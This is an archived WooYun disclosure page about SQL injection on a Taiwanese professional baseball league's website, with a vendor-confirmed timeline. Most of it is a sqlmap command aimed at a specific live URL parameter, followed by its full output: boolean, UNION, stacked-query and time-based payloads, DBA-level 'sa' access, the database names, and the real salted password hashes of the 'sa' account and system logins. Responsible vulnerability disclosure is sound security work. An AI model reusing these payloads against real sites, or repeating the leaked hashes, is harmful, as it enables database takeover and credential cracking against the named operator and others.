乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-04: 细节已通知厂商并且等待厂商处理中 2015-03-08: 厂商已经确认,细节仅向厂商公开 2015-03-18: 细节向核心白帽子及相关领域专家公开 2015-03-28: 细节向普通白帽子公开 2015-04-07: 细节向实习白帽子公开 2015-04-18: 细节向公众公开
台灣某職業大聯盟SQL Injection
[root@Hacker~]# Sqlmap sqlmap.py -u "http://www.cpbl.com.tw/photo/list.aspx?album_id=100" --dbs --passwords --current-user --current-db sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l[*] starting at 21:15:20[21:15:21] [INFO] resuming back-end DBMS 'microsoft sql server'[21:15:21] [INFO] testing connection to the target URLsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: album_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: album_id=100' AND 6903=6903 AND 'gOCi'='gOCi Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: album_id=-6039' UNION ALL SELECT CHAR(113)+CHAR(101)+CHAR(115)+CHAR(101)+CHAR(113)+CHAR(119)+CHAR(79)+CHAR(113)+CHAR(87)+CHAR(67)+CHAR(112)+CHAR(107)+CHAR(105)+CHAR(112)+CHA Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: album_id=100'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: album_id=100' WAITFOR DELAY '0:0:5'-----[21:15:21] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008[21:15:21] [INFO] fetching current user[21:15:21] [WARNING] reflective value(s) found and filtering outcurrent user: 'sa'[21:15:21] [INFO] fetching current databasecurrent database: 'cpbl2014'[21:15:21] [INFO] fetching database users password hashes[21:15:21] [INFO] the SQL query used returns 3 entries[21:15:21] [INFO] retrieved: "##MS_PolicyEventProcessingLogin##","0x0100b9b11...[21:15:22] [INFO] retrieved: "##MS_PolicyTsqlExecutionLogin##","0x0100c488f8b...[21:15:22] [INFO] retrieved: "sa","0x01000a7d31ddbdcfe5f3382f611c3dbf94ff5d7c...do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] ndo you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] ndatabase management system users password hashes:[*] ##MS_PolicyEventProcessingLogin## [1]: password hash: 0x0100b9b112931c8584c890956313a22483a6f619d67257fb4d54 header: 0x0100 salt: b9b11293 mixedcase: 1c8584c890956313a22483a6f619d67257fb4d54[*] ##MS_PolicyTsqlExecutionLogin## [1]: password hash: 0x0100c488f8b3da96c6c7d5044e1e5e614525278424c50ebdaa16 header: 0x0100 salt: c488f8b3 mixedcase: da96c6c7d5044e1e5e614525278424c50ebdaa16[*] sa [1]: password hash: 0x01000a7d31ddbdcfe5f3382f611c3dbf94ff5d7ca81e6eef7efa header: 0x0100 salt: 0a7d31dd mixedcase: bdcfe5f3382f611c3dbf94ff5d7ca81e6eef7efa[21:15:34] [INFO] fetching database names[21:15:34] [INFO] the SQL query used returns 6 entries[21:15:34] [INFO] resumed: "cpbl2014"[21:15:34] [INFO] resumed: "event_db"[21:15:34] [INFO] resumed: "master"[21:15:34] [INFO] resumed: "model"[21:15:34] [INFO] resumed: "msdb"[21:15:34] [INFO] resumed: "tempdb"available databases [6]:[*] cpbl2014[*] event_db[*] master[*] model[*] msdb[*] tempdb[21:15:34] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement w[21:15:34] [INFO] fetched data logged to text files under 'C:\Users\ADMINI~1\Desktop\???~1\???~1\SQLMAP~1.4\Bin\output\www.cpbl.com.tw'
null
危害等级:高
漏洞Rank:20
确认时间:2015-03-08 04:12
current user: 'sa'current user is DBA: True謝謝通報
暂无